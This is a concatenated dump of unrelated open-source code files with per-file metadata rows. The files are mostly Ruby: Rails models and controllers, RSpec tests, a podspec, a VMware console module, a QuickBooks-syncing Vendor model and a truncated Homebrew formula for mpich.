# reporting or troubleshooting requests.
# Corresponds to the JSON property `requestId`
# @return [String]
attr_accessor :request_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@request_id = args[:request_id] if args.key?(:request_id)
end
end
#
class TokenPagination
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `nextPageToken`
# @return [String]
attr_accessor :next_page_token
#
# Corresponds to the JSON property `previousPageToken`
# @return [String]
attr_accessor :previous_page_token
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@next_page_token = args[:next_page_token] if args.key?(:next_page_token)
@previous_page_token = args[:previous_page_token] if args.key?(:previous_page_token)
end
end
end
end
end
| 39.171965 | 118 | 0.625484 |
e203d6be0c3d3ac4ae8fa9ba0125e3a519ebc51a | 3,782 | require 'spec_helper'
describe Vaderc::Configuration do
context '#initialize' do
describe 'attributes' do
let(:configuration) { Vaderc::Configuration.new }
it 'has a default port' do
expect(configuration.port).to eq('6667')
end
it 'has a default mode' do
expect(configuration.mode).to eq('8')
end
it 'has a default server' do
expect(configuration.server).to eq('localhost')
end
it 'has a default nickname' do
expect(configuration.nickname).to match(/vaderc\d+/)
end
it 'has a default realname' do
expect(configuration.realname).to match(/Vaderc User/)
end
it 'can receive custom attributes' do
config = Vaderc::Configuration.new(
port: '1138',
mode: '1999',
server: 'localhost',
nickname: 'dummy',
realname: 'big dummy'
)
expect(config.port).to eq('1138')
expect(config.mode).to eq('1999')
expect(config.server).to eq('localhost')
expect(config.nickname).to eq('dummy')
expect(config.realname).to eq('big dummy')
end
it 'can override defaults with env vars' do
stub_const(
'ENV',
'VADERC_PORT' => '1138',
'VADERC_MODE' => '1999',
'VADERC_SERVER' => 'localhost',
'VADERC_NICKNAME' => 'tommy',
'VADERC_REALNAME' => 'tommy cool'
)
expect(configuration.port).to eq('1138')
expect(configuration.mode).to eq('1999')
expect(configuration.server).to eq('localhost')
expect(configuration.nickname).to eq('tommy')
expect(configuration.realname).to eq('tommy cool')
end
end
context 'config_filename' do
let(:configuration) do
Vaderc::Configuration.new(config_filename: 'config.yml')
end
it 'has a default config_filename' do
stub_const('ENV', 'HOME' => '/home/user')
configuration = Vaderc::Configuration.new
expect(configuration.config_filename)
.to eq('/home/user/.vaderc/config.yml')
end
it 'can specifiy config_filename' do
expect(configuration.config_filename).to eq('config.yml')
end
describe 'config_filename exists' do
before do
allow(File).to receive('exist?').with('config.yml') { true }
allow(File).to receive('read').with('config.yml') { content }
end
let(:content) do
<<-'.'
:server: localhost
:mode: 8
:port: 6668
:nickname: testUser
:realname: Real User
.
end
it 'uses file if config_filename exists' do
expect(configuration.mode).to eq(8)
expect(configuration.port).to eq(6668)
expect(configuration.server).to eq('localhost')
expect(configuration.nickname).to eq('testUser')
expect(configuration.realname).to eq('Real User')
end
describe '#load_local_config' do
it 'returns a hash' do
expected = {
server: 'localhost',
mode: 8,
port: 6668,
nickname: 'testUser',
realname: 'Real User'
}
hash = configuration.load_local_config('config.yml')
expect(hash).to be_kind_of(Hash)
expect(hash).to eq(expected)
end
it 'returns empty hash if config_file is invalid yaml' do
allow(File).to receive('read').with('config.yml') { 'bad_content' }
expect(configuration.load_local_config('config.yml')).to eq({})
end
end
end
end
end
end
| 29.546875 | 79 | 0.558699 |
ac4b43c3e29877f254c3734109593a2931b47ce4 | 1,548 | #
# Be sure to run `pod lib lint Lib1.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'Lib1'
s.version = '0.0.1'
s.summary = 'some thing must be done'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/seabird2020/Lib1'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'seabird2020' => '[email protected]' }
s.source = { :git => 'https://github.com/seabird2020/Lib1.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'Lib1/Classes/**/*'
# s.resource_bundles = {
# 'Lib1' => ['Lib1/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36 | 100 | 0.627261 |
1a436cb43af44af200ce2699b1f9f8895b3939cc | 418 | module RemoteService
class Base
class << self
def queue_name
"services.#{@queue ||= default_queue_name}"
end
private
def queue(name)
@queue = name
end
def default_queue_name
self.name.split(/::/).last.
gsub(/([A-Z]+)([A-Z][a-z])/,'\1_\2').
gsub(/([a-z\d])([A-Z])/,'\1_\2').
tr("-", "_").downcase
end
end
end
end
| 17.416667 | 51 | 0.480861 |
bb0f7c07954ff0450dd52ac53134e765f6671b7b | 390 | class CreateOrderedWorkPackages < ActiveRecord::Migration[5.1]
def change
create_table :ordered_work_packages do |t|
t.integer :position, index: true, null: false
t.references :query, type: :integer, foreign_key: { index: true, on_delete: :cascade }
t.references :work_package, type: :integer, foreign_key: { index: true, on_delete: :cascade }
end
end
end
| 35.454545 | 99 | 0.702564 |
61d7065c4330dca68279f21aca82c76d6d8ac73b | 433 | class Typewriter::ImageUploadsController < ApplicationController
skip_before_action :verify_authenticity_token
def create
render json: Typewriter::ImageUpload.create!(image_params).to_json
end
def show
upload = Typewriter::ImageUpload.find(params[:id])
render json: {
src: upload.image_src,
srcset: upload.image_srcset
}
end
private
def image_params
params.permit(:image)
end
end
| 18.826087 | 70 | 0.727483 |
4ab5b746dab4c2706925b0cbb405d95dacab6f81 | 1,445 | require "helper/acceptance"
class FlowdockNotificationTest < Test::Unit::AcceptanceTestCase
story <<-EOS
As an administrator,
I want to setup the Flowdock notifiers on my projects
So that I get alerts with every build
EOS
setup do
load "integrity/notifier/flowdock.rb"
@token = "fc7795d580b6adacaa90f1ds24030s14a31a6522sed"
@repo = git_repo(:my_test_project)
Project.gen(:my_test_project, :uri => @repo.uri)
@api_url = "https://api.flowdock.com/v1/messages/team_inbox/#{@token}"
end
teardown do
WebMock.reset!
Notifier.available.replace({})
end
def commit(successful)
successful ? @repo.add_successful_commit : @repo.add_failing_commit
@repo.short_head
end
def build
login_as "admin", "test"
visit "/my-test-project"
click_link "Edit"
check "enabled_notifiers_flowdock"
fill_in "API Token", :with => @token
check "Notify on success?"
click_button "Update"
click_button "Manual Build"
end
scenario "Notifying a successful build" do
head = commit(true)
stub_request(:post, @api_url).to_return(
:status => 200,
:body => {}.to_json)
build
assert_requested :post, @api_url
end
scenario "Notifying a failed build" do
head = commit(false)
stub_request(:post, @api_url).to_return(
:status => 200,
:body => {}.to_json)
build
assert_requested :post, @api_url
end
end
| 22.230769 | 74 | 0.672664 |
acca54cd52fbd4b51a6b123153381777d3fd5f1a | 3,553 | class Name < AbstractModel
# Is it safe to merge this Name with another? If any information will get
# lost we return false. In practice only if it has Namings.
def mergeable?
namings.empty?
end
# Merge all the stuff that refers to +old_name+ into +self+. Usually, no
# changes are made to +self+, however it might update the +classification+
# cache if the old name had a better one -- NOT SAVED!! Then +old_name+ is
# destroyed; all the things that referred to +old_name+ are updated and
# saved.
def merge(old_name)
return if old_name == self
xargs = {}
# Move all observations over to the new name.
old_name.observations.each do |obs|
obs.name = self
obs.save
end
# Move all namings over to the new name.
old_name.namings.each do |name|
name.name = self
name.save
end
# Move all misspellings over to the new name.
old_name.misspellings.each do |name|
if name == self
name.correct_spelling = nil
else
name.correct_spelling = self
end
name.save
end
# Move over any interest in the old name.
Interest.where(target_type: "Name", target_id: old_name.id).each do |int|
int.target = self
int.save
end
# Move over any notifications on the old name.
Notification.where(flavor: Notification.flavors[:name],
obj_id: old_name.id).each do |note|
note.obj_id = id
note.save
end
# # Merge the two "main" descriptions if it can.
# if self.description and old_name.description and
# (self.description.source_type == :public) and
# (old_name.description.source_type == :public)
# self.description.merge(old_name.description, true)
# end
# If this one doesn't have a primary description and the other does,
# then make it this one's.
if !description && old_name.description
self.description = old_name.description
end
# Update the classification cache if that changed in the process.
if description &&
(classification != description.classification)
self.classification = description.classification
end
# Move over any remaining descriptions.
old_name.descriptions.each do |desc|
xargs = {
id: desc,
set_name: self
}
desc.name_id = id
desc.save
end
# Log the action.
if old_name.rss_log
old_name.rss_log.orphan(old_name.display_name, :log_name_merged,
this: old_name.display_name, that: display_name)
end
# Destroy past versions.
editors = []
old_name.versions.each do |ver|
editors << ver.user_id
ver.destroy
end
# Update contributions for editors.
editors.delete(old_name.user_id)
editors.uniq.each do |user_id|
SiteData.update_contribution(:del, :names_versions, user_id)
end
# Fill in citation if new name is missing one.
if citation.blank? && old_name.citation.present?
self.citation = old_name.citation.strip_squeeze
end
# Save any notes the old name had.
if old_name.has_notes? && (old_name.notes != notes)
if has_notes?
self.notes += "\n\nThese notes come from #{old_name.format_name} when it was merged with this name:\n\n" +
old_name.notes
else
self.notes = old_name.notes
end
log(:log_name_updated, touch: true)
save
end
# Finally destroy the name.
old_name.destroy
end
end
| 29.363636 | 114 | 0.642274 |
edbe428a28242892aecaa774be8b53e20ca854d3 | 1,306 | require 'test_helper'
describe Lotus::Validations do
describe '.attribute' do
it 'coerces attribute names to symbols' do
assert AttributeTest.defined_validation?(:attr)
end
it 'ensures attribute uniqueness' do
assert UniquenessAttributeTest.defined_validation?(:attr)
end
it 'collects multiple errors for a single attribute' do
validator = MultipleValidationsTest.new(email: 'test', email_confirmation: 'x')
validator.valid?.must_equal false
errors = validator.errors.for(:email)
errors.must_equal [
Lotus::Validations::Error.new(:email, :format, /@/, 'test'),
Lotus::Validations::Error.new(:email, :confirmation, true, 'test')
]
end
describe 'name checks' do
it 'checks validation names' do
exception = -> {
Class.new {
include Lotus::Validations
attribute :email, pesence: true, comfirmation: true
}
}.must_raise ArgumentError
exception.message.must_equal 'Unknown validation(s): pesence, comfirmation for "email" attribute'
end
end
end
describe '.defined_attributes' do
it 'returns a set of unique attribute names' do
UniquenessAttributeTest.defined_attributes.must_equal(Set.new(%w(attr)))
end
end
end
| 29.022222 | 105 | 0.667688 |
87b3f2c21a1699c67494819729d48c59a1d8a37b | 575 | #
# Append to empty file
#
user 'test_user'
file '/tmp/emptyfile'
append_if_no_line 'should add to empty file' do
path '/tmp/emptyfile'
line 'added line'
end
append_if_no_line 'missing_file' do
path '/tmp/missing_create'
line 'added line'
end
append_if_no_line 'missing_file with owner, group, mode' do
path '/tmp/missing_create_owner'
line 'Owned by test_user'
owner 'test_user'
group 'test_user'
mode '0600'
end
append_if_no_line 'missing_file fail' do
path '/tmp/missing_fail'
line 'added line'
ignore_missing false
ignore_failure true
end
| 17.424242 | 59 | 0.742609 |
1db10da957590a8298d2df61ab73a68b3da64ed8 | 1,345 | # -*- encoding: utf-8 -*-
# stub: dotenv 2.5.0 ruby lib
Gem::Specification.new do |s|
s.name = "dotenv"
s.version = "2.5.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Brandon Keepers"]
s.date = "2018-06-21"
s.description = "Loads environment variables from `.env`."
s.email = ["[email protected]"]
s.executables = ["dotenv"]
s.files = ["bin/dotenv"]
s.homepage = "https://github.com/bkeepers/dotenv"
s.licenses = ["MIT"]
s.rubygems_version = "2.4.8"
s.summary = "Loads environment variables from `.env`."
s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<rspec>, [">= 0"])
s.add_development_dependency(%q<rubocop>, ["~> 0.40.0"])
else
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<rspec>, [">= 0"])
s.add_dependency(%q<rubocop>, ["~> 0.40.0"])
end
else
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<rspec>, [">= 0"])
s.add_dependency(%q<rubocop>, ["~> 0.40.0"])
end
end
| 32.804878 | 105 | 0.628996 |
28316c8757c0f65278b041f958677a724d5575f0 | 5,469 | module ManageIQ::Providers::Vmware::InfraManager::Vm::RemoteConsole
require_dependency 'securerandom'
def console_supported?(type)
%w(VMRC VNC WEBMKS).include?(type.upcase)
end
def validate_remote_console_acquire_ticket(protocol, options = {})
raise(MiqException::RemoteConsoleNotSupportedError, "#{protocol} remote console requires the vm to be registered with a management system.") if ext_management_system.nil?
raise(MiqException::RemoteConsoleNotSupportedError, "remote console requires console credentials") if ext_management_system.authentication_type(:console).nil? && protocol == "vmrc"
options[:check_if_running] = true unless options.key?(:check_if_running)
raise(MiqException::RemoteConsoleNotSupportedError, "#{protocol} remote console requires the vm to be running.") if options[:check_if_running] && state != "on"
end
def remote_console_acquire_ticket(userid, originating_server, protocol)
send("remote_console_#{protocol.to_s.downcase}_acquire_ticket", userid, originating_server)
end
def remote_console_acquire_ticket_queue(protocol, userid)
task_opts = {
:action => "acquiring Vm #{name} #{protocol.to_s.upcase} remote console ticket for user #{userid}",
:userid => userid
}
queue_opts = {
:class_name => self.class.name,
:instance_id => id,
:method_name => 'remote_console_acquire_ticket',
:priority => MiqQueue::HIGH_PRIORITY,
:role => 'ems_operations',
:zone => my_zone,
:args => [userid, MiqServer.my_server.id, protocol]
}
MiqTask.generic_action_with_callback(task_opts, queue_opts)
end
#
# VMRC
#
def remote_console_vmrc_acquire_ticket(_userid = nil, _originating_server = nil)
validate_remote_console_acquire_ticket("vmrc")
ticket = ext_management_system.remote_console_vmrc_acquire_ticket
{:ticket => ticket, :remote_url => build_vmrc_url(ticket), :proto => 'remote'}
end
def validate_remote_console_vmrc_support
validate_remote_console_acquire_ticket("vmrc")
ext_management_system.validate_remote_console_vmrc_support
true
end
#
# WebMKS
#
def remote_console_webmks_acquire_ticket(userid, originating_server = nil)
validate_remote_console_acquire_ticket("webmks")
ticket = ext_management_system.vm_remote_console_webmks_acquire_ticket(self)
SystemConsole.force_vm_invalid_token(id)
console_args = {
:user => User.find_by(:userid => userid),
:vm_id => id,
:ssl => true,
:protocol => 'webmks',
:secret => ticket['ticket'],
:url_secret => SecureRandom.hex,
}
SystemConsole.launch_proxy_if_not_local(console_args, originating_server, ticket['host'], ticket['port'].to_i)
end
def validate_remote_console_webmks_support
validate_remote_console_acquire_ticket("webmks")
ext_management_system.validate_remote_console_webmks_support
true
end
#
# HTML5 selects the best available console type (VNC or WebMKS)
#
def remote_console_html5_acquire_ticket(userid, originating_server = nil)
protocol = with_provider_object { |v| v.extraConfig["RemoteDisplay.vnc.enabled"] == "true" } ? 'vnc' : 'webmks'
send("remote_console_#{protocol}_acquire_ticket", userid, originating_server)
end
#
# VNC
#
def remote_console_vnc_acquire_ticket(userid, originating_server)
validate_remote_console_acquire_ticket("vnc")
password = SecureRandom.base64[0, 8] # Random password from the Base64 character set
host_port = host.reserve_next_available_vnc_port
# Determine if any Vms on this Host already have this port, and if so, disable them
old_vms = host.vms_and_templates.where(:vnc_port => host_port)
old_vms.each do |old_vm|
_log.info "Disabling VNC on #{old_vm.class.name} id: [#{old_vm.id}] name: [#{old_vm.name}], since the port is being reused."
old_vm.with_provider_object do |vim_vm|
vim_vm.setRemoteDisplayVncAttributes(:enabled => false, :port => nil, :password => nil)
end
end
old_vms.update_all(:vnc_port => nil)
# Enable on this Vm with the requested port and random password
_log.info "Enabling VNC on #{self.class.name} id: [#{id}] name: [#{name}]"
with_provider_object do |vim_vm|
vim_vm.setRemoteDisplayVncAttributes(:enabled => true, :port => host_port, :password => password)
end
update(:vnc_port => host_port)
SystemConsole.force_vm_invalid_token(id)
console_args = {
:user => User.find_by(:userid => userid),
:vm_id => id,
:ssl => false,
:protocol => 'vnc',
:secret => password,
:url_secret => SecureRandom.hex
}
host_address = host.hostname
SystemConsole.launch_proxy_if_not_local(console_args, originating_server, host_address, host_port)
end
private
# Method to generate the remote URI for the VMRC console
def build_vmrc_url(ticket)
url = URI::Generic.build(:scheme => "vmrc",
:userinfo => "clone:#{ticket}",
:host => ext_management_system.hostname || ext_management_system.ipaddress,
:port => 443,
:path => "/",
:query => "moid=#{ems_ref}").to_s
# VMRC doesn't like brackets around IPv6 addresses
url.sub(/(.*)\[/, '\1').sub(/(.*)\]/, '\1')
end
end
| 37.204082 | 184 | 0.685134 |
b94305deabdfd6d17c3378b3d63fd53113b29840 | 1,072 | require 'spec_helper'
describe Mapper::Builder, '.run' do
subject { object.run(mapper_base_class, model, &block) }
let(:object) { described_class }
let(:model) { mock('Model') }
let(:builder) { mock('Builder', :mapper => mapper) }
let(:mapper) { mock('Mapper') }
let(:mapper_base_class) { mock('Mapper Base Class') }
context 'without block' do
let(:block) { nil }
it 'should raise error' do
expect { subject }.to raise_error(ArgumentError, 'Need a block to build mapper')
end
end
context 'with block' do
let(:block) { lambda { |instance| } }
before do
described_class.stub(:new => builder)
end
it 'should retun mapper' do
should be(mapper)
end
it 'should instance eval block on builder' do
executed = false
builder.stub!(:instance_eval) do |proc|
proc.should equal(block)
executed = true
end
subject
executed.should be_true
end
end
end
| 25.52381 | 86 | 0.567164 |
185109e6bb82e2a20eaaca2a951336ceb3681cd5 | 148 | class AddSenseLexemeId < ActiveRecord::Migration
def change
add_column :senses, :lexeme_id, :uuid
add_index :senses, :lexeme_id
end
end
| 21.142857 | 48 | 0.743243 |
387b42484522c68f62ba55179ed9be7b7bfc174e | 145 | RSpec::Matchers.define :be_file do
match do |actual|
ssh_exec(RSpec.configuration.host, commands.check_file(actual))
$? == 0
end
end
| 20.714286 | 67 | 0.703448 |
e2eaec2affdbf476de62454547a7c3176d004e02 | 75 | class Location < ActiveRecord::Base
include DocumentFrequencyConcern
end
| 18.75 | 35 | 0.84 |
e93bf671ede5b75710702e2ee9f7a539bf455b26 | 561 | # frozen_string_literal: true
# typed: true
# compiled: true
# run_filecheck: INITIAL
# run_filecheck: OPT
extend T::Sig
sig {params(str: String, obj: T.untyped).returns(T::Boolean)}
def streq(str, obj)
str === obj
end
# INITIAL-LABEL: "func_Object#streq"
# INITIAL: call i64 @sorbet_int_rb_str_equal
# INITIAL{LITERAL}: }
# OPT-LABEL: "func_Object#streq"
# OPT-NOT: call i64 @sorbet_int_rb_str_equal
# OPT: call i64 @rb_str_equal
# OPT-NOT: call i64 @sorbet_int_rb_str_equal
# OPT{LITERAL}: }
p streq("str", 1)
p streq("str", "str")
p streq("str", nil)
| 20.777778 | 61 | 0.713012 |
e2a198cf1a4a9641ab0bb59f92ed6ed0bd2567db | 261 | class CreateUserLocationJoinTable < ActiveRecord::Migration
def change
create_table :user_location_joins do |t|
t.references :location, index: true, null: false
t.references :user, index: true, null: false
t.timestamps
end
end
end
| 26.1 | 59 | 0.712644 |
111d2597d76e304a960ef261abc00a27532973f1 | 12,329 | class Vendor < ActiveRecord::Base
include Concerns::RSAPublicKeyEncryptor
attr_accessor :synced
WIRE_PAYMENT_FIELDS = [:routing_number, :bank_account_number]
CHECK_PAYMENT_FIELDS = [:address1, :city, :zip, :state]
VENDOR_BUILDER_ATTRIBUTES = [:name, :address1, :address2, :city, :state, :zip, :email]
enum source: [:user, :worker]
enum auto_pay_weekly: {
sunday: 0,
monday: 1,
tuesday: 2,
wednesday: 3,
thursday: 4,
friday: 5,
saturday: 6
}
enum payment_term: {
pay_after_bill_received: 0,
pay_day_of_month: 1,
pay_before_due_date: 2,
pay_after_bill_date: 3,
pay_after_due_date: 4,
pay_weekly: 5
}
enum payment_term_end: {
keep_paying: 0,
pay_amount_exeeds: 1,
end_pay_after_n_payments: 2,
pay_before_date: 3,
end_auto_pay_alert: 4
}
enum payment_ammount_type: [:full_payment, :fixed_amount]
enum created_by: [:by_user, :by_worker]
enum payment_status: {
do_not_autopay: 0,
autopay: 1,
allways_mark_as_paid: 2
}
enum status: [:active, :inactive]
belongs_to :user, inverse_of: :vendors
belongs_to :liability_account, class_name: "Account", foreign_key: :liability_account_id
belongs_to :expense_account, class_name: "Account", foreign_key: :expense_account_id
belongs_to :qb_class, foreign_key: :default_qb_class_id
belongs_to :parent, class_name: 'Vendor', foreign_key: :parent_id
has_many :invoices, inverse_of: :vendor
has_many :alerts, as: :alertable
has_many :line_items, inverse_of: :vendor
has_many :invoice_transactions, through: :line_items
has_many :childrens, class_name: 'Vendor', foreign_key: :parent_id
has_many :alert_settings, class_name: 'VendorAlertSettings'
encrypt :routing_number, :bank_account_number, obfuscate_with: Obfuscator.new
after_initialize :set_defaults
before_save :set_qb_d_name
before_save :cancel_accounts_default
before_save :sync_with_user_accounts, :sync_with_quickbooks_desktop
before_save :recalculate_line_items_default
before_save :set_comparation_string
before_save :set_status
after_save :calculate_invoices_due_dates_if_payment_term_changed
after_save :update_bills_if_autopay_changed
after_save :recalculate_invoices_statuses
after_save :update_intercom
after_commit :sync_with_quickbooks, :recalculate_invoice_item_hit_creation
after_update :duplicate_vendor
after_initialize :build_alert_settings, :if => proc { |o| o.alert_settings.nil? }
accepts_nested_attributes_for :invoices, :alert_settings
has_paper_trail
# validates :name, presence: true
# validate :group_fields
normalize_attribute :address1, :address2, :zip, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.downcase : value
end
normalize_attribute :state, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.upcase : value
end
normalize_attribute :city, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.titleize : value
end
normalize_attribute :name, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.downcase.titleize : value
end
delegate :liability_accounts, :expense_accounts, :to => :user
delegate :archived_invoices, :less_than_30, :more_than_30, :to => :invoices
def self.typeahead_search(params, current_user)
name = params[:name].try(:downcase)
if user = current_user
user.vendors.active.where("lower(name) LIKE ?", "#{name}%")
elsif user = InvoiceModeration.find_by(invoice_id: params[:invoice_id]).try(:invoice).try(:user)
user.vendors.active.by_user.where("lower(name) LIKE ?", "#{name}%")
else
[]
end
end
def self.only_parents
where(parent_id: nil)
end
def valid_vendor_fields?
fields = VENDOR_BUILDER_ATTRIBUTES.collect { |e| send(e) }
fields.all?(&:present?)
end
def formated_vendor
[name, address1, address2, city, state].map { |e| e.present? ? e : '?' }.join(', ')
end
def unique_line_items(send_as_json = false)
line_items.uniq_items(send_as_json)
end
def wire_payment_fields_filled?
!WIRE_PAYMENT_FIELDS.any? {|field| send(field).blank? }
end
def check_payment_fields_filled?
!CHECK_PAYMENT_FIELDS.any? {|field| send(field).blank? }
end
def wire_or_payment_fields_filled?
wire_payment_fields_filled? || check_payment_fields_filled?
end
alias_method :valid_vendor?, :wire_or_payment_fields_filled?
def autopay_active?
autopay?
end
def pay_day_of_month_date
today = Date.current
max_days = Time.days_in_month(today.month)
day = day_of_the_month >= max_days ? max_days : day_of_the_month
Date.new(today.year, today.month, day)
end
def set_defaults
self.after_recieved ||= user.try(:default_due_date)
end
def vendor_ref
return nil unless qb_id
vendor = Quickbooks::Model::BaseReference.new
vendor.name = name
vendor.value = qb_id
vendor
end
def set_pay_before_due_date(due_date, created_at)
created_at = created_at ? created_at : Date.today
if before_due_date == 0
due_date || created_at.to_date
else
if due_date
before_due_date.business_day.before(due_date).to_date
else
1.business_day.before(created_at.to_date).to_date
end
end
end
def set_pay_after_due_date(due_date, created_at)
created_at = created_at ? created_at : Date.today
if after_due_date == 0
created_at
else
after_due_date.business_day.after(due_date).to_date
end
end
def sync_with_quickbooks
return true if synced
return true unless user && user.intuit_authentication?
return true unless check_payment_fields_filled?
self.synced = true
# QuickbooksSync::Vendors::Vendor.find(id).sync!
end
def merge!(merge_id)
vendor = Vendor.find(merge_id)
childrens << [vendor.childrens, vendor].flatten
touch
end
def unmerge!
update_attributes(parent_id: nil)
invoices.where(status: [4,5,6,7,8,11]).where.not(txn_id: nil).update_all(sync_qb: true)
end
def synced_qb?
edit_sequence && qb_d_id
end
def qb_xml_attributes
hash = {}
hash[:list_id] = qb_d_id if qb_d_id && edit_sequence
hash[:edit_sequence] = edit_sequence if edit_sequence && qb_d_id
hash.merge!({ name: qb_d_name, is_active: active?, company_name: qb_d_name })
hash.merge!(vendor_address: vendor_address_attributes) if vendor_address_attributes.any?
hash.merge!({name_on_check: "#{name}".truncate(41, omission: '') })
hash
end
def vendor_address_attributes
hash = {
addr1: address1,
addr2: address2,
city: city,
state: state,
postal_code: zip
}
hash.delete_if {|k,v| v.nil? || v.try(:blank?) }
hash
end
def to_qb_xml
search_on_qb ? query_qb_d : update_or_create_xml_qb
end
def sync_with_quickbooks_desktop
return true unless name.present?
return true unless [name_changed?, address1_changed?, address2_changed?, city_changed?, zip_changed?, routing_number_changed?, bank_account_number_changed?, liability_account_id_changed?].any?
self.search_on_qb = true unless qb_d_id
self.sync_qb = true
true
end
def sync_with_quickbooks_desktop!
self.search_on_qb = true unless qb_d_id
self.sync_qb = true
save
QBWC.add_job(:update_vendors, true, '', QuickbooksWC::VendorWorker, [] )
true
end
def query_qb_d
{
vendor_query_rq: {
xml_attributes: { "requestID" => id },
full_name: qb_d_name
}
}
end
def update_or_create_xml_qb
sync_type = qb_d_id ? :vendor_mod : :vendor_add
{
"#{sync_type}_rq".to_sym => {
xml_attributes: { "requestID" => id },
sync_type => qb_xml_attributes
}
}
end
def resync_invoices
invoices.where(status: [4,5,6,7]).each do |invoice|
invoice.sync_with_quickbooks_desktop(true)
end
end
def default_item
line_items.find_or_create_by(description: InvoiceTransaction::DEFAULT_ITEM_NAME)
end
def invoices
return super unless children_ids.any?
ids = [id, children_ids].flatten.compact
Invoice.where(vendor_id: ids)
end
def default_liability_account
@default_liability_account ||= liability_account || user.liability_account || user.accounts.where(name: "Accounts Payable (A/P)").first
end
private
def group_fields
return if wire_or_payment_fields_filled?
errors.add(:groupFields, "Must have a payment method (Wire/Check filled out for every vendor")
end
def update_bills_if_autopay_changed
return true unless payment_term_changed? && autopay_active?
invoices.ready_for_payment.update_all(status: 5)
true
end
def sync_with_user_accounts
return true unless user
set_account_liablility_default if selected_from_default_liability || new_record? || !liability_account
set_account_expense_default if selected_from_default_expense || new_record? || !expense_account
true
end
def default_liability_account
@default_liability_account ||= user.liability_account || user.accounts.where(name: "Accounts Payable (A/P)").first
end
def default_expense_account
@user_default ||= user.expense_account || user.accounts.where(name: "Cost of Goods Sold").first
end
def set_account_liablility_default
self.liability_account = default_liability_account
self.selected_from_default_liability = true
end
def set_account_expense_default
self.expense_account = default_expense_account
self.selected_from_default_expense = true
end
def cancel_accounts_default
self.selected_from_default_liability = false if liability_account_id_changed? && default_liability_account != liability_account
self.selected_from_default_expense = false if expense_account_id_changed? && default_expense_account != expense_account
true
end
def recalculate_line_items_default
line_items.where(selected_from_default_expense: true).update_all(expense_account_id: expense_account_id) if expense_account_id_changed?
line_items.where(selected_from_default_liability: true).update_all(liability_account_id: liability_account_id) if liability_account_id_changed?
end
# TODO: This should go to a worker
def calculate_invoices_due_dates_if_payment_term_changed
attrs_changed = [day_of_the_month_changed?, after_recieved_changed?,
payment_term_changed?, auto_pay_weekly_changed?,
before_due_date_changed?, after_due_date_changed?]
return true unless attrs_changed.any?
opts = { "vendor_id" => id, "recalculate_date" => true }
InvoicesWorker.perform_async(opts)
true
end
def recalculate_invoices_statuses
return true if valid_vendor? && name.present?
return true unless VENDOR_BUILDER_ATTRIBUTES.collect {|attr| send("#{attr}_changed?") }.any?
invoices.where(status: [4,5]).update_all(status: 3)
end
def recalculate_invoice_item_hit_creation
return true unless VENDOR_BUILDER_ATTRIBUTES.collect {|attr| send("#{attr}_changed?") }.any?
return true unless valid_vendor_fields?
invoices.each do |invoice|
next unless invoice.filled_amount_due?
next unless [invoice.received?, invoice.need_information?].any?
next if invoice.hits.for_line_item.any?
invoice.save
end
end
def duplicate_vendor
return true unless worker? && source_changed?
new_vendor = self.dup
new_vendor.id = nil
new_vendor.parent_id = id
new_vendor.save
update_attributes(source: :user)
true
end
def set_qb_d_name
return true unless name.present?
return true unless user
new_name = "#{name} - billSync".truncate(39, omission: "- billSync")
n = 1
while user.vendors.where(qb_d_name: new_name).present?
new_name = "#{name} - billSync #{n}".truncate(39, omission: "- billSync #{n}")
n += 1
end
self.qb_d_name = new_name
true
end
def update_intercom
return true if Rails.env.test?
IntercomUpdater.delayed_update(user)
end
def set_comparation_string
self.comparation_string = [name, address1, address2, city, state, zip].join(", ")
true
end
def set_status
return true unless by_user?
self.created_by = :by_user
true
end
end
| 29.495215 | 196 | 0.725525 |
03e2d52de8dab13145631667a2df258d7ae42d93 | 2,745 | class Mpich < Formula
desc "Implementation of the MPI Message Passing Interface standard"
homepage "https://www.mpich.org/"
url "https://www.mpich.org/static/downloads/3.3.2/mpich-3.3.2.tar.gz"
mirror "https://fossies.org/linux/misc/mpich-3.3.2.tar.gz"
sha256 "4bfaf8837a54771d3e4922c84071ef80ffebddbb6971a006038d91ee7ef959b9"
bottle do
cellar :any
sha256 "7d46386dd93ee397ce6dd9f3198aa16aa9e1390699396f3f3b4135087f6ed216" => :catalina
sha256 "865e53a39ea105d5d646986b64a0ad9096cdbf4135d7435448062bc458cb6a64" => :mojave
sha256 "9d5dc18a7f5a9283f225e117f6ae879f1205249799287150a0e63ef177682077" => :high_sierra
sha256 "1826a384790d0687debf83b7ce14482df71d6cd51a99105a00340b37ba5018c6" => :x86_64_linux
end
head do
url "https://github.com/pmodels/mpich.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
depends_on "gcc" # for gfortran
